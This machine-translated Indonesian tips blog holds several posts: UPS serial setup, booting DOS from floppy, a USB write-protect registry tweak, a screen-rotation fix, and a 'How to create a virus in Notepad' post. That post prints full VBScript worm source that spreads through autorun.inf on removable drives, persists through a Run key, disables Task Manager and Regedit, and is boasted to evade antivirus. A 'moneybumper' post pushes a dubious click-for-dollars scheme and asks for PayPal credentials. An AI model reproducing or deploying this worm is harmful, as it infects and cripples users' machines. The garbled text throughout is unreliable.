Tampilkan postingan dengan label tips-trick. Tampilkan semua postingan
Tampilkan postingan dengan label tips-trick. Tampilkan semua postingan

Jumat, 23 Maret 2012

Speed ​​up your internet connection with APC UPS.

This time I happened to use the type of APC BE525 UPS U.S. Backs UPS includingolder models are equipped with RS232 serial port for communication with a PC.Software used is APCpowerChute Personal Edition mengistalnya following step of the way:

Prentalasi
Perform a set konektisitas printalasi on PCThere is some type of APC UPS with a different connectionUSB connections are usually plug and play As with the RS232com.

1.ASign in to Device manager of the Star Menu> Right-click Computer> Manage






2In the device manager menuright click and Edit Cummunications Port Properties.






3In the Properties window select the settings tab there are some ports to regulateboudrate Settings and other settings for COM1.






4Users select the type BacksUPS Bit Per second to 2400 for serial communicationwhich is not too fast.






5Other Regulatory Data Bits 8 Stop Bits 1 Parity Without Without Flow Control




GOOD TRY

By the way Turning on the Computer Using DOS

Ok now my friend will give you tips on how to turn on the computer a bit before using theDOS operating system is widely used type of window used to lots of computers that useDOS with DOS computers can be turned on without a hard drive that is quitemememakai diskette that has been filled with the DOSFurthermore, to enable it can be done by following these steps look carefully:

1.AInsert a floppy disk that already contains DOS disk into flooppy
2Press the power button on the CPU and monitor


Current date is sat 06-22-06
Enter New Date (mm-dd-yy)
If the monthdate and tahaun mentioned above have not been completed then type themonth and year of the current date, then press Enter.
Crurent Time is 12:00:00:00
Enter New Time
When the clock is in compliance if necessary and press Enter.
Once completed will be displayed
A: \>
The operating system is actually the basis of the other operating system to boot fromfloppy, but is rarely used nowadays Window XPWindow Vistaand Windows 7 for any particular circles are still many use the Linux.

Ok here's to know first if it is less able to ask

Kamis, 02 Februari 2012

How to create a virus in Notepad


Assalammualaikum wr.wb.halooo all excited to meet his buddies blog. . Malem I'll share a little how to make virus using Notepad to make a virus also does not have to use VB or programs with a Notepad lainyah enough you can make a worm virus. The spread of this virus through the AUTO PLAY. . Buddy do not kwatir this virus can be detected by antivirus software such as PCMAV, AVAST, or else. . Lest 








we begin to go:Now Buddy Notepadnyah open-Copy the following code:'/ /-The beginning of the code, set so that when the error occurred and then proceed left-viral activity / /on error resume next'/ /-Dim the following words-/ /rekur dim, windowpath, flashdrive, fs, mf, content, tf, fruit bats, nt, check, sd'/ /-Set a text that will be made to Autorun Setup Information-/ /content = "[autorun]" & vbCrLf & "ShellExecute = wscript.exe k4l0n6.dll.vbs"set fs = CreateObject ("Scripting.FileSystemObject")set mf = fs.getfile (Wscript.ScriptFullname)dim text, sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream (1, -2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbCrLfloopdo'/ /-Copy itself to become the master file in the Windows Path (example: C: \ Windows)Set windowpath = fs.getspecialfolder (0)set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs")tf.attributes = 32set tf = fs.createtextfile (windowpath & "\ batch-k4l0n6.dll.vbs", 2, true)tf.write recursivetf.closeset tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs")tf.attributes = 39'/ /-Create Atorun.inf to run the virus automatically each flash disc plugged-/ /'It spreads to every drive that bertype 1 and 2 (removable) including diskettesfor each flashdrive in fs.drives'/ /-Check Drive-/ /If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then'/ /-Create infector if it turns out Drivetypr 1 or 2. Or A: \ - / /set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs")tf.attributes = 32set tf = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs", 2, true)tf.write recursivetf.closeset tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs")tf.attributes = 39'/ /-Create a text Atorun.inf it had been prepared (Auto Setup Information) - / /set tf = fs.getfile (flashdrive.path & "\ autorun.inf")tf.attributes = 32set tf = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true)tf.write contentstf.closeset tf = fs.getfile (flashdrive.path & "\ autorun.inf")tf.attributes = 39end ifnext'/ /-Manipulation Registry-/ /set bat = CreateObject ("WScript.Shell")'/ /-Manip - Title Change Internet Explorer becomes THE Bats vs. Zay-/ /kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "THE Bats vs. Zay "'/ /-Manip - Set so that hidden files are not displayed in Explorer-/ /kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"'/ /-Manip - Eliminate the Find menu, Folder Options, Run, and block Regedit and Task Manager-/ /kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", "REG_DWORD"kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions", "1", "REG_DWORD"kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun", "1", "REG_DWORD"kalong.RegWrite "1", "REG_DWORD"kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"'/ /-Manip - Disable right-click / /kalong.RegWrite "1", "REG_DWORD"'/ /-Manip - Raise Every Windows Startup Message-/ /kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ LegalNoticeCaption", "Worm Bats. Variant from Rangga-Zay, do not panic all the data are safe. "'/ /-Manip - On every Windows Startup-/ /kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch-k4l0n6.dll.vbs"'/ /-Manip - Change and Organization RegisteredOwner-/ /kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix"kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner", "Bats"'/ /-Now if the code below I do not know, help to explain Aat_S Mas-/ /if check <> 1 thenWScript.Sleep 200 000end ifloop while check <> 1set sd = CreateObject ("WScript.Shell")sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname'End of Code
Save the code in Notepad by FILE> SAVE. Then in the save as type select "All Files.Simpan by name: k4l0n6.dll.vbs. Actually not have pake *. dll also do nothing but attempt to avoid suspicious wrote.He .. he ... Worm Virus this is not purely of my own thoughts because it mimics its viral code Rangga-Zay. But this one better because it was not detected using PCMAV RC15, ClamAV, and AVAST. Itung-itung this for you know if it makes a virus / worm does not need to buy pirated software. Use Notepad (from Windows Original) also can .. .. . Bunis thank Ms. knowledge of ms


Sabtu, 10 Desember 2011

Proteksi Data Copy To USB Drive in Window 7

Most computer users would have a very important data on a laptop computer that hasmereka.You who often lent a friend and have a lot of important data in certainlydo not want my friend if the friend is in vain to copy important data in USB flash theirbuddy.

OK, now I will memeberi few tips for my friend who wanted to protect the data You.Inginno longer worry if the data in the copy buddy buddy friend,? please follow the followingtroubleshooting steps.

1.ketikan "regedit" (without quotes) in the Start menu> Search programs and Files and press the Enter key on the keyboard

2.ON the Registry Editor navigate the cursor to the PACT HKEY_LOCAL_MACHINE \SYSTEM \ CurrentControlSet \ Control.Right 


3.Klik Foldel Control menu and then select New. Key in the context menu thatappears after that, give a name to a new key with the "StrogeDevicePolicies" (without the quotes).



Right 4.Klik StrogeDevicePolicies folder you just created Then Select the menu New>DWORD (32 bit) Value on the context menu that muncul.Than it, give it a name for theDWORD (32 bit) Value of new "WriteProtect"



5.Click two items WriteProtect .ON reply dialog box appears, tik number "1" in the contact field data.Than Va. Lue, click the OK button.

6.Finally, Continous Log off your computer, the existing data in the computer will not beable to copy or move them to the USB flash.


GOOD TRY.





Selasa, 01 Maret 2011

How to get $ dollars easily


I'll explain how to get dollar $ easily even with a single right click we can immediatelynote the $ dollar fine this way

1.You must be at http://www.moneybumer.com LIST

2.lalu content there registration join for free now!
  - First name - gender

  -last name - age

  -email - country

  -password

3.If there is no country Indonesia you click ajach pendaptaran suksek other if theprocess then you will be taken to the first page

4.there any reading below the bumper you click ajach there sebanyack 5 times to get $ dollars if it is to click 5 times you can not wait ngeklik again tomorrow if you want toclick again if the dollars you have $ 15,000 then you must click the cash out if already in the click then you akn taken to another page to the employed

5.moneybumper is also very useful if you want to buy anti-virus software .... there whopaid ordinary githu nyach Klau we want to buy the software may have to click on a visabca kya banks with money bumper gthu but we just click there is paypal click on paypaland the contents of the username & password moneybumper then you can directlyanti-virus, software who paid ...

  all these 5 tips from me hopefully useful and good luck ..... thanks

Minggu, 27 Februari 2011

Reply how to restore your screen upside down

My post today how to restore the reply screen upside down:





  • My post today how to restore the screen upside down to answer:
  • I had my laptop upside down but with the way I end my screen so it's back to normal 
  • for those who suddenly your laptop screen upside down I've got tips nyach you do notpanic if the screen upside down so the 180 drjt to the left or right who will not know ifpanic
  • how his press ctrl-^ on the left ctrl-^ remember, if your screen suddenly left to bottom right you can also restore it if you want to go back to the right nyach screen to the left so press ctrl-<atau press ctrl-> like normal again press ctrl-^
  • troubleshooting my luck .......


 
Design by iQbal ditan M | Sponsor by Yahoo - Bing | cheap international calls